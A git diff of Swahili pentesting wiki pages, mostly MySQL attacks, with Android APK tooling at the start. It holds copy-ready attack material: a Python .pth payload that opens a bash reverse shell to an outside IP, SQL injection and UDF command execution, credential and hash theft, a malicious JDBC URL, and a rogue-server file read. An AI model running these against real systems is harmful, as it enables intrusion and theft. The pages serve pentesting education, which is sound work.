- Analyze APKs using: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD)
- Toka private information kutoka APK kwa kutumia regexps.
- Chambua Manifest.
- Chambua domains zilizopatikana kwa kutumia: [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) and [whatweb](https://github.com/urbanadventurer/WhatWeb)
- Deobfuscate APK via [apk-deguard.com](http://www.apk-deguard.com)
- Kutoa msimbo wa Java na Smali kwa kutumia zana mbalimbali
- Kuchambua APKs using: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD)
- Kutoa taarifa za kibinafsi kutoka kwenye APK kwa kutumia regexps.
- Kuchambua Manifest.
- Kuchambua domain zilizopatikana using: [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) and [whatweb](https://github.com/urbanadventurer/WhatWeb)
- Kuondoa obfuscation ya APK kupitia [apk-deguard.com]
### Koodous
Useful to detect malware: [https://koodous.com/](https://koodous.com)
Inafaa kugundua malware: [https://koodous.com/](https://koodous.com/)
## Obfuscating/Deobfuscating code
## Kuficha/Kuondoa kuficha msimbo
Kumbuka kwamba, kutegemea huduma na usanidi utakao tumia kuficha msimbo, secrets zinaweza kuwa zimefichwa au zisifichwe.
Kumbuka kwamba, kulingana na huduma na usanidi unayotumia kuficha msimbo, siri zinaweza kufichwa au zisifichwe.
### [ProGuard](<https://en.wikipedia.org/wiki/ProGuard_(software)>)
From [Wikipedia](<https://en.wikipedia.org/wiki/ProGuard_(software)>): **ProGuard** is an open source command-line tool that shrinks, optimizes and obfuscates Java code. Inaweza kuboresha bytecode pamoja na kugundua na kuondoa maagizo yasiyotumika. ProGuard ni programu ya bure na inasambazwa chini ya GNU General Public License, version 2.
From [Wikipedia](<https://en.wikipedia.org/wiki/ProGuard_(software)>): **ProGuard** ni zana ya open source ya command-line inayopunguza, kuboresha na kuficha Java code. Ina uwezo wa kuboresha bytecode pamoja na kugundua na kuondoa maagizo yasiyotumika. ProGuard ni programu huria na inasambazwa chini ya GNU General Public License, version 2.
ProGuard inasambazwa kama sehemu ya Android SDK na inaendesha wakati wa kujenga application katika release mode.
ProGuard inatolewa kama sehemu ya Android SDK na inafanya kazi wakati wa kujenga application katika release mode.
### [DexGuard](https://www.guardsquare.com/dexguard)
Pata mwongozo hatua kwa hatua wa ku-deobfuscate apk katika [https://blog.lexfo.fr/dexguard.html](https://blog.lexfo.fr/dexguard.html)
(From that guide) Last time we checked, the Dexguard mode of operation was:
(From that guide) Mara ya mwisho tulipoangalia, mode ya uendeshaji wa Dexguard ilikuwa:
- pakia resource kama InputStream;
- pitisha matokeo kwa class inayoirithi kutoka FilterInputStream ili ku-decrypt;
- fanya obfuscation isiyo na maana ili kumwudhiwa reverser kwa muda;
- pitisha result iliyodecrypted kwa ZipInputStream ili kupata faili la DEX;
- hatimaye pokea DEX iliyopatikana kama Resource kwa kutumia method ya `loadDex`.
- load a resource as an InputStream;
- feed the result to a class inheriting from FilterInputStream to decrypt it;
- do some useless obfuscation to waste a few minutes of time from a reverser;
- feed the decrypted result to a ZipInputStream to get a DEX file;
- finally load the resulting DEX as a Resource using the `loadDex` method.
### [DeGuard](http://apk-deguard.com)
**DeGuard reverses the process of obfuscation performed by Android obfuscation tools. This enables numerous security analyses, including code inspection and predicting libraries.**
Unaweza kupakia APK iliyofichwa kwenye jukwaa lao.
Unaweza kupakia APK iliyofichwa kwenda kwenye platform yao.
### [Deobfuscate android App]https://github.com/In3tinct/deobfuscate-android-app
Hii ni zana ya LLM ya kutafuta potential security vulnerabilities katika android apps na ku-deobfuscate code ya android app. Inatumia Google's Gemini public API.
Hii ni zana ya LLM ya kutafuta udhaifu wowote wa usalama katika android apps na ku-deobfuscate android app code. Inatumia Google's Gemini public API.
### [Simplify](https://github.com/CalebFenton/simplify)
Ni **generic android deobfuscator.** Simplify **virtually executes an app** ili kuelewa tabia yake kisha **hujaribu kuboresha msimbo** ili ufanye kazi sawasawa lakini uwe rahisi kwa mwanadamu kuufahamu. Kila aina ya optimization ni rahisi na generic, kwa hivyo haijalishi ni aina gani ya obfuscation ilitumika.
Ni generic android deobfuscator. Simplify virtually executes an app ili kuelewa mienendo yake kisha inajaribu optimize the code ili iitende sawa lakini iwe rahisi kwa binadamu kuelewa. Kila aina ya optimization ni rahisi na generic, hivyo haijalishi aina maalum ya obfuscation inayotumiwa.
### [APKiD](https://github.com/rednaga/APKiD)
APKiD inakupa taarifa kuhusu **jinsi APK ilivyotengenezwa**. Inatambua compilers nyingi, packers, obfuscators, na mambo mengine ya ajabu. Ni [_PEiD_](https://www.aldeid.com/wiki/PEiD) kwa Android.
APKiD inakupa taarifa kuhusu **how an APK was made**. Inatambua many **compilers**, **packers**, **obfuscators**, na mambo mengine ya ajabu. Ni [_PEiD_](https://www.aldeid.com/wiki/PEiD) kwa Android.
### Manual
[Read this tutorial to learn some tricks on **how to reverse custom obfuscation**](manual-deobfuscation.md)
## Labs
## Maabara
### [Androl4b](https://github.com/sh4hin/Androl4b)
AndroL4b ni mashine halisi ya usalama ya Android inayotegemea ubuntu-mate inayojumuisha mkusanyiko wa frameworks za hivi punde, tutorials na maabara kutoka kwa wanageek wa usalama na watafiti kwa ajili ya reverse engineering na malware analysis.
AndroL4b ni Android security virtual machine inayotokana na ubuntu-mate inayojumuisha mkusanyiko wa latest framework, tutorials na labs kutoka kwa security geeks na researchers mbalimbali kwa reverse engineering na malware analysis.
## References
## Marejeo
- [https://owasp.org/www-project-mobile-app-security/](https://owasp.org/www-project-mobile-app-security/)
- [https://appsecwiki.com/#/](https://appsecwiki.com/#/) Ni orodha nzuri ya rasilimali
@ -815,7 +816,7 @@ AndroL4b ni mashine halisi ya usalama ya Android inayotegemea ubuntu-mate inayoj
- [SSLPinDetect GitHub](https://github.com/aancw/SSLPinDetect)
- [smali-sslpin-patterns](https://github.com/aancw/smali-sslpin-patterns)
## Yet to try
## Bado kujaribu
- [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
- [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)

149
src/network-services-pentesting/pentesting-mysql.md
View File

@ -4,15 +4,15 @@
## **Maelezo ya Msingi**
**MySQL** inaweza kuelezewa kama mfumo wa usimamizi wa hifadhidata za mahusiano (Relational Database Management System - RDBMS) wa chanzo wazi unaopatikana bila gharama. Inatumia **Structured Query Language (SQL)**, ikiruhusu usimamizi na urekebishaji wa hifadhidata.
**MySQL** inaweza kuelezewa kama mfumo wa chanzo wazi wa **Relational Database Management System (RDBMS)** unaopatikana bila malipo. Inatumia **Structured Query Language (SQL)**, ikiruhusu usimamizi na uendeshaji wa hifadhidata.
**Bandari ya chaguo-msingi:** 3306
```
3306/tcp open mysql
```
## **Unganisha**
## **Kuunganisha**
### **Lokali**
### **Ndani**
```bash
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
@ -24,7 +24,7 @@ mysql -h <Hostname> -u root@localhost
```
## External Enumeration
Baadhi ya vitendo za enumeration zinahitaji credentials halali
Baadhi ya vitendo vya enumeration vinahitaji credentials halali
```bash
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
@ -36,7 +36,7 @@ msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
```
### [**Brute force**](../generic-hacking/brute-force.md#mysql)
### Andika data yoyote ya binari
### Andika data yoyote ya binary
```bash
CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
@ -78,7 +78,7 @@ quit;
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'
```
### Uorodheshaji wa Ruhusa za MySQL
### Kuorodhesha Ruhusa za MySQL
```sql
#Mysql
SHOW GRANTS [FOR user];
@ -101,7 +101,7 @@ SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCT
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
```
Unaweza kuona katika nyaraka maana ya kila ruhusa: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_execute)
Unaweza kuona katika nyaraka maana ya kila privilege: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_execute)
### MySQL File RCE
@ -110,44 +110,47 @@ Unaweza kuona katika nyaraka maana ya kila ruhusa: [https://dev.mysql.com/doc/re
../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
{{#endref}}
#### INTO OUTFILE → Python `.pth` RCE (mabano ya usanidi maalum kwa tovuti)
#### INTO OUTFILE → Python `.pth` RCE (hook za usanidi maalum za tovuti)
Kwa kutumia vibaya primitive ya jadi `INTO OUTFILE` inawezekana kupata *arbitrary code execution* kwenye vichwa vinavyotekelezwa baadaye na scripts za **Python**.
Kwa kutumia mbinu ya kawaida ya `INTO OUTFILE` inawezekana kupata *arbitrary code execution* kwenye malengo ambayo baadaye yanaendesha **Python** scripts.
1. Tumia `INTO OUTFILE` kuweka faili maalum **`.pth`** ndani ya direktori yoyote inayopakuliwa kiotomatiki na `site.py` (mfano `.../lib/python3.10/site-packages/`).
2. Faili ya `.pth` inaweza kuwa na *mstari mmoja* unaoanza na `import ` ukifuatiwa na arbitrary Python code ambao utaendeshwa kila wakati mtafsiri anapoanza.
3. Wakati mtafsiri anapoendeshwa kwa njia isiyo ya moja kwa moja na CGI script (kwa mfano `/cgi-bin/ml-draw.py` yenye shebang `#!/bin/python`) payload inatekelezwa kwa ruhusa sawa na mchakato wa web-server (FortiWeb uliuendesha kama **root** → full pre-auth RCE).
1. Tumia `INTO OUTFILE` kuandika faili maalum **`.pth`** ndani ya direktori yoyote inayopakiwa kiotomatiki na `site.py` (kwa mfano `.../lib/python3.10/site-packages/`).
2. Faili `.pth` inaweza kuwa na *mstari mmoja* unaoanza na `import ` ukifuatiwa na arbitrary Python code ambayo itaendeshwa kila wakati interpreter inapoanza.
3. Wakati interpreter inapoendeshwa kwa njia isiyoonekana na CGI script (kwa mfano `/cgi-bin/ml-draw.py` yenye shebang `#!/bin/python`) payload itatekelezwa kwa vibali sawa na mchakato wa web-server (FortiWeb iliiendesha kama **root** → full pre-auth RCE).
Example `.pth` payload (single line, no spaces can be included in the final SQL payload, so hex/`UNHEX()` or string concatenation may be required):
```python
import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)
```
Mfano wa kutengeneza faili kupitia query ya **UNION** (nafasi zilibadilishwa na `/**/` ili kuepuka kichujio cha nafasi cha `sscanf("%128s")` na kudumisha urefu wa jumla ≤128 bytes):
Mfano wa kutengeneza faili kupitia ombi la **UNION** (alama za nafasi zilibadilishwa na `/**/` ili kupita kichujio cha nafasi cha `sscanf("%128s")` na kudumisha jumla ya urefu ≤128 bytes):
```sql
'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'
```
Mapungufu muhimu na njia za kuyapita:
Vizuizi muhimu & njia za kuepuka:
* `INTO OUTFILE` **haiwezi kuandika tena** mafaili yaliyopo; chagua jina jipya la faili.
* Njia ya faili inatatuliwa **kuhusiana na CWD ya MySQL**, hivyo kuwekeza kwa `../../` mwanzoni kunasaidia kufupisha njia na kupita vikwazo vya njia kamili.
* Ikiwa ingizo la mshambuliaji linachukuliwa kwa `%128s` (au kama hiyo) nafasi yoyote itakata payload; tumia mfululizo wa maoni wa MySQL `/**/` au `/*!*/` kubadilisha nafasi.
* Mtumiaji wa MySQL anayeendesha query anahitaji idhini ya `FILE`, lakini katika vifaa vingi (m.f. FortiWeb) huduma inaendesha kama **root**, ikitoa ufikiaji wa kuandika karibu kila mahali.
* `INTO OUTFILE` **haiwezi kuandika juu ya** faili zilizopo; chagua jina jipya la faili.
* Njia ya faili inatatuliwa **relative to MySQLs CWD**, kwa hivyo kuweka `../../` mwanzoni husaidia kufupisha njia na kuepuka vikwazo vya absolute-path.
* Ikiwa input ya mshambulizi imetolewa kwa `%128s` (au sawa) nafasi yoyote itakata payload; tumia mfululizo wa comment za MySQL `/**/` au `/*!*/` kubadilisha nafasi.
* Mtumiaji wa MySQL anayetekeleza query anahitaji ruhusa ya `FILE`, lakini katika appliances nyingi (mfano FortiWeb) service inaendeshwa kama **root**, ikitoa ufikiaji wa kuandika karibu kila mahali.
Baada ya kuangusha `.pth`, omba tu CGI yoyote inayoshughulikiwa na python interpreter ili kupata code execution:
Baada ya kuangusha `.pth`, omba tu CGI yoyote inayosimamiwa na interpreter ya python ili kupata code execution:
```
GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>
```
Mchakato wa Python uta-import `.pth` yenye madhara kiotomatiki na utekeleze shell payload.
Mchakato wa Python uta-import `.pth` yenye madhara kiotomatiki na uta-execute shell payload.
```
# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)
```
---
## MySQL arbitrary read file by client
Kwa kweli, unapojaribu **load data local into a table** ili kupata **content of a file**, MySQL au MariaDB server humuuliza **client to read it** na kutuma maudhui. **Kisha, ikiwa unaweza kubadilisha mysql client ili kuungana na MySQL server yako mwenyewe, unaweza kusoma arbitrary files.**\ Tafadhali kumbuka kwamba hili ndilo tabia linapotumika kutumia:
Kwa kweli, unapojaribu **load data local into a table** server ya MySQL au MariaDB inaomba **client to read it** na kutuma **content of a file**. **Then, if you can tamper a mysql client to connect to your own MySQL server, you can read arbitrary files.**\
Tafadhali kumbuka kwamba hili ndilo tabia linapotumika:
```bash
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
```
@ -158,33 +161,31 @@ mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
```
**PoC ya Awali:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\
**Kwenye karatasi hii unaweza kuona maelezo kamili ya shambulio na hata jinsi ya kuiendeleza hadi RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\
**PoC ya awali:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\
**Kwenye karatasi hii unaweza kuona maelezo kamili ya shambulio na hata jinsi ya kulipanua hadi RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\
**Hapa unaweza kupata muhtasari wa shambulio:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/)
## POST
### Mtumiaji wa Mysql
### Mysql User
Itakuwa ya kuvutia sana ikiwa mysql inaendeshwa kama **root**:
Itakuwa ya kuvutia sana ikiwa mysql inaendesha kama **root**:
```bash
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1
```
#### Mipangilio Hatari ya mysqld.cnf
Katika usanidi wa huduma za MySQL, mipangilio mbalimbali hutumika kubainisha uendeshaji wake na hatua za usalama:
Katika usanidi wa huduma za MySQL, mipangilio mbalimbali hutumika kuweka jinsi inavyofanya kazi na hatua za usalama:
- Mipangilio ya **`user`** inatumika kuonyesha mtumiaji chini ya ambaye huduma ya MySQL itaendeshwa.
- **`password`** inatumiwa kuweka nywila inayohusiana na mtumiaji wa MySQL.
- **`admin_address`** inaonyesha anwani ya IP inayosikiliza muunganisho wa TCP/IP kwenye kiolesura cha mtandao cha usimamizi.
- Kigezo cha **`debug`** kinaonyesha mipangilio ya sasa ya debugging, pamoja na taarifa nyeti ndani ya logs.
- **`sql_warnings`** inasimamia kama mistari ya taarifa itatengenezwa kwa statement za INSERT za mstari mmoja wakati warnings zinapotokea, ikiwa na data nyeti ndani ya logs.
- Kwa **`secure_file_priv`**, wigo wa shughuli za kuingiza na kusafirisha data umewekwa mipaka ili kuongeza usalama.
- The **`user`** setting is utilized for designating the user under which the MySQL service will be executed.
- **`password`** is applied for establishing the password associated with the MySQL user.
- **`admin_address`** specifies the IP address that listens for TCP/IP connections on the administrative network interface.
- The **`debug`** variable is indicative of the present debugging configurations, including sensitive information within logs.
- **`sql_warnings`** manages whether information strings are generated for single-row INSERT statements when warnings emerge, containing sensitive data within logs.
- With **`secure_file_priv`**, the scope of data import and export operations is constrained to enhance security.
### Privilege escalation
```bash
@ -206,16 +207,16 @@ grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mys
```
### Privilege Escalation via library
Ikiwa **mysql server inafanya kazi kama root** (au mtumiaji mwingine mwenye ruhusa zaidi) unaweza kuifanya itekeleze amri. Kwa hivyo, unahitaji kutumia **user defined functions**. Na ili kuunda user defined function utahitaji **maktaba** kwa ajili ya OS inayotumika na mysql.
Ikiwa **mysql server is running as root** (au user mwingine mwenye ruhusa zaidi) unaweza kuifanya itekeleze amri. Kwa hiyo, unahitaji kutumia **user defined functions**. Na ili kuunda user defined utahitaji **library** kwa OS inayomkimbia mysql.
Maktaba haribifu inayotumika inaweza kupatikana ndani ya sqlmap na metasploit kwa kufanya **`locate "*lib_mysqludf_sys*"`**. Faile za **`.so`** ni maktaba za **linux** na za **`.dll`** ni za **Windows**; chagua ile unayohitaji.
Library hasidi ya kutumia inaweza kupatikana ndani ya sqlmap na metasploit kwa kufanya **`locate "*lib_mysqludf_sys*"`**. Faili za **`.so`** ni maktaba za **linux** na **`.dll`** ni za **Windows**, chagua ile unayohitaji.
Ikiwa **huna** maktaba hizo, unaweza ama **kuzikatafuta**, au pakua hii [**linux C code**](https://www.exploit-db.com/exploits/1518) na **compile ndani ya mashine ya linux iliyo dhaifu**:
Kama huna libraries hizo, unaweza ama **kutafuta** hizo, au kupakua hii [**linux C code**](https://www.exploit-db.com/exploits/1518) na **kucompile ndani ya mashine ya linux iliyo dhaifu**:
```bash
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```
Sasa baada ya kuwa na maktaba, ingia ndani ya Mysql kama mtumiaji mwenye vibali (root?) na fuata hatua zifuatazo:
Sasa baada ya kuwa na maktaba, ingia ndani ya Mysql kama mtumiaji mwenye ruhusa za juu (root?) na fuata hatua zinazofuata:
#### Linux
```sql
@ -251,36 +252,36 @@ SELECT sys_exec("net localgroup Administrators npn /add");
```
#### Windows tip: create directories with NTFS ADS from SQL
Kwenye NTFS unaweza kulazimisha uundaji wa saraka kwa kutumia alternate data stream hata wakati kuna tu primitive ya kuandika faili. Ikiwa classic UDF chain inatarajia saraka ya `plugin` lakini haipo na `@@plugin_dir` haijulikani au imefungwa, unaweza kuunda kwanza kwa kutumia `::$INDEX_ALLOCATION`:
Kwenye NTFS unaweza kulazimisha uundaji wa saraka kwa kutumia alternate data stream hata pale ambapo kuna primitive ya kuandika faili pekee. Ikiwa classic UDF chain inatarajia saraka ya `plugin` lakini haipo na `@@plugin_dir` haijulikani au imefungwa, unaweza kuunda kwanza kwa `::$INDEX_ALLOCATION`:
```sql
SELECT 1 INTO OUTFILE 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
-- After this, `C:\\MySQL\\lib\\plugin` exists as a directory
```
Hii inabadilisha `SELECT ... INTO OUTFILE` iliyo na vikwazo kuwa primitive kamili zaidi kwenye Windows stacks kwa kuanzisha muundo wa folda unaohitajika kwa UDF drops.
Hii inabadilisha `SELECT ... INTO OUTFILE` iliyo na mipaka kuwa primitive kamili zaidi kwenye Windows stacks kwa kuanzisha muundo wa folda unaohitajika kwa UDF drops.
### Kutoa MySQL credentials kutoka kwa mafayela
### Kutoa taarifa za kuingia za MySQL kutoka kwenye faili
Ndani ya _/etc/mysql/debian.cnf_ unaweza kupata **plain-text password** ya mtumiaji **debian-sys-maint**
Ndani ya _/etc/mysql/debian.cnf_ unaweza kupata **nenosiri kwa maandishi wazi** la mtumiaji **debian-sys-maint**
```bash
cat /etc/mysql/debian.cnf
```
Unaweza **kutumia vithibitisho hivi kuingia kwenye database ya mysql**.
Unaweza **kutumia credentials hizi kuingia kwenye mysql database**.
Inside the file: _/var/lib/mysql/mysql/user.MYD_ you can find **hash zote za watumiaji wa MySQL** (ile ambazo unaweza kuzitoa kutoka mysql.user inside the database)_._
Ndani ya faili: _/var/lib/mysql/mysql/user.MYD_ unaweza kupata **all the hashes of the MySQL users** (ambazo unaweza extract kutoka mysql.user ndani ya database)_._
Unaweza kuzitoa kwa kufanya:
Unaweza extract hizo kwa kufanya:
```bash
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```
### Kuwezesha kurekodi
### Kuwezesha uandishi wa logi
Unaweza kuwezesha kurekodi maulizo ya mysql ndani ya `/etc/mysql/my.cnf` kwa kuondoa maoni (uncomment) kwenye mistari ifuatayo:
Unaweza kuwezesha uandishi wa logi za maswali za mysql ndani ya `/etc/mysql/my.cnf` kwa kuondoa alama za kusimamishwa (uncomment) kwenye mistari ifuatayo:
![](<../images/image (899).png>)
### Faili muhimu
### Mafaili muhimu
Faili za konfigurasi
Mafaili ya usanidi
- windows \*
- config.ini
@ -297,12 +298,12 @@ Faili za konfigurasi
- /etc/my.cnf
- Historia ya amri
- \~/.mysql.history
- Faili za logi
- Mafaili ya logi
- connections.log
- update.log
- common.log
## Databasi/Meza za MySQL za Kawaida
## Default MySQL Database/Tables
{{#tabs}}
{{#tab name="information_schema"}}
@ -605,7 +606,7 @@ x$session\
x$statement_analysis\
x$statements\_with\_errors\_or\_warnings\
x$statements_with_full_table_scans\
x$statements\_with\_runtimes\_in_95th\_percentile\
x$statements\_with\_runtimes\_in\_95th\_percentile\
x$statements_with_sorting\
x$statements\_with\_temp\_tables\
x$user_summary\
@ -613,7 +614,7 @@ x$user\_summary\_by\_file\_io\
x$user_summary_by_file_io_type\
x$user\_summary\_by\_stages\
x$user_summary_by_statement_latency\
x$user\_summary\_by\_statement\_type\
x$user\_summary_by_statement_type\
x$wait_classes_global_by_avg_latency\
x$wait\_classes\_global\_by\_latency\
x$waits_by_host_by_latency\
@ -653,36 +654,36 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
```
## 2023-2025 Mambo Muhimu (mpya)
## 2023-2025 Mambo Muhimu (vipya)
### JDBC `propertiesTransform` deserialization (CVE-2023-21971)
From Connector/J <= 8.0.32 mshambulizi ambaye anaweza kuathiri **JDBC URL** (kwa mfano katika third-party software inayouliza connection string) anaweza kuomba arbitrary classes zisonakiliwe upande wa *client* kupitia parameter ya `propertiesTransform`. Ikiwa gadget iliyopo kwenye class-path inaweza kupakiwa hili litatokea kama **remote code execution in the context of the JDBC client** (pre-auth, kwa sababu hakuna valid credentials zinazohitajika). A minimal PoC looks like:
Kutoka Connector/J <= 8.0.32 attacker ambaye anaweza kuathiri **JDBC URL** (kwa mfano katika third-party software inayouliza connection string) anaweza kuomba arbitrary classes zipakwe upande wa *client* kupitia parameter ya `propertiesTransform`. Ikiwa gadget iliyopo kwenye class-path inaweza kupakiwa, hii husababisha **remote code execution in the context of the JDBC client** (pre-auth, kwa sababu hakuna valid credentials zinahitajika). PoC ndogo inavyoonekana:
```java
jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil
```
Kuendesha `Evil.class` inaweza kuwa rahisi kama kuiweka kwenye class-path ya programu iliyo hatarini au kuruhusu rogue MySQL server kutuma malicious serialized object. Tatizo lilisuluhishwa katika Connector/J 8.0.33 sasisha driver au weka wazi `propertiesTransform` kwenye allow-list.
(Angalia Snyk write-up kwa maelezo)
Kukimbiza `Evil.class` kunaweza kuwa rahisi—kama kuifanya ionekane kwenye class-path ya application iliyo na udhaifu, au kuruhusu rogue MySQL server kutuma serialized object yenye madhara. Tatizo limerekebishwa katika Connector/J 8.0.33 sasisha driver au kwa uwazi weka `propertiesTransform` kwenye allow-list.
(Tazama Snyk write-up kwa maelezo)
### Shambulio za Rogue / Fake MySQL server dhidi ya JDBC clients
Zana kadhaa za open-source zinautekeleza protocol ya MySQL *sehemu* ili kushambulia JDBC clients zinazounganisha kwa nje:
### Rogue / Fake MySQL server attacks against JDBC clients
Vyombo kadhaa vya open-source vinatekeleza *partial* MySQL protocol ili kushambulia JDBC clients zinazoungana nje:
* **mysql-fake-server** (Java, inaunga mkono file read na deserialization exploits)
* **mysql-fake-server** (Java, inasaidia file read na deserialization exploits)
* **rogue_mysql_server** (Python, uwezo sawa)
Njia za kawaida za shambulio:
1. Programu ya mwathiriwa inapakia `mysql-connector-j` ikiwa na `allowLoadLocalInfile=true` au `autoDeserialize=true`.
2. Mshambuliaji anadhibiti DNS / host entry ili hostname ya DB iendelee kutambulika na mashine inayodhibitiwa na yeye.
3. Server ya hatari inajibu kwa packets zilizotengenezwa ambazo zinasababisha ama `LOCAL INFILE` kusoma faili kiholela au Java deserialization → RCE.
1. Programu ya mwathiriwa inapakia `mysql-connector-j` ikiwa imewekwa `allowLoadLocalInfile=true` au `autoDeserialize=true`.
2. Mshambuliaji anadhibiti DNS / host entry ili hostname ya DB irejelee kwa mashine iliyoko chini ya udhibiti wao.
3. Server yenye madhara inajibu na packets zilizotengenezwa ambazo zinaanzisha ama `LOCAL INFILE` arbitrary file read au Java deserialization → RCE.
Mfano wa one-liner kuanzisha fake server (Java):
Mfano wa amri ya mstari mmoja kuanzisha fake server (Java):
```bash
java -jar fake-mysql-cli.jar -p 3306 # from 4ra1n/mysql-fake-server
```
Kisha elekeza programu ya mwathirika kwa `jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true` na usome `/etc/passwd` kwa ku-encode jina la faili kwa base64 katika sehemu ya *username* (`fileread_/etc/passwd``base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=`).
Kisha elekeza victim application kwa `jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true` na usome `/etc/passwd` kwa kuandika jina la faili kwa base64 kwenye uwanja wa *username* (`fileread_/etc/passwd``base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=`).
### Cracking `caching_sha2_password` hashes
MySQL ≥ 8.0 inahifadhi hash za password kama **`$mysql-sha2$`** (SHA-256). Hashcat (mode **21100**) na John-the-Ripper (`--format=mysql-sha2`) zote zinaunga mkono offline cracking tangu 2023. Fanya dump ya safu ya `authentication_string` na uipe moja kwa moja:
### Kuvunja `caching_sha2_password` hashi
MySQL ≥ 8.0 huhifadhi hashi za nywila kama **`$mysql-sha2$`** (SHA-256). Zote mbili Hashcat (mode **21100**) na John-the-Ripper (`--format=mysql-sha2`) zinaunga mkono kuvunja offline tangu 2023. Toa kolamu ya `authentication_string` na uipe moja kwa moja:
```bash
# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
@ -691,16 +692,16 @@ hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist
```
### Orodha ya ukaguzi wa kuimarisha (2025)
Weka `LOCAL_INFILE=0` na `--secure-file-priv=/var/empty` ili kuzima sehemu nyingi za kusoma/kuandika faili.
• Ondoa ruhusa ya `FILE` kutoka kwa akaunti za programu.
• Kwa Connector/J weka `allowLoadLocalInfile=false`, `allowUrlInLocalInfile=false`, `autoDeserialize=false`, `propertiesTransform=` (tupu).
• Zima plugins za uthibitishaji zisizotumika na **lazimisha TLS** (`require_secure_transport = ON`).
• Fuatilia `CREATE FUNCTION`, `INSTALL COMPONENT`, `INTO OUTFILE`, `LOAD DATA LOCAL` na tamko za ghafla za `SET GLOBAL`.
### Orodha ya kuimarisha usalama (2025)
Set **`LOCAL_INFILE=0`** and **`--secure-file-priv=/var/empty`** ili kuondoa primitives nyingi za kusoma/kuandika faili.
• Ondoa ruhusa ya **`FILE`** kutoka kwa akaunti za programu.
• Kwenye Connector/J weka `allowLoadLocalInfile=false`, `allowUrlInLocalInfile=false`, `autoDeserialize=false`, `propertiesTransform=` (tupu).
• Zima plugins za uthibitishaji zisizotumika na **lazimisha TLS** (`require_secure_transport = ON`).
• Fuatilia `CREATE FUNCTION`, `INSTALL COMPONENT`, `INTO OUTFILE`, `LOAD DATA LOCAL` na amri ghafla za `SET GLOBAL`.
---
## Marejeo
## References
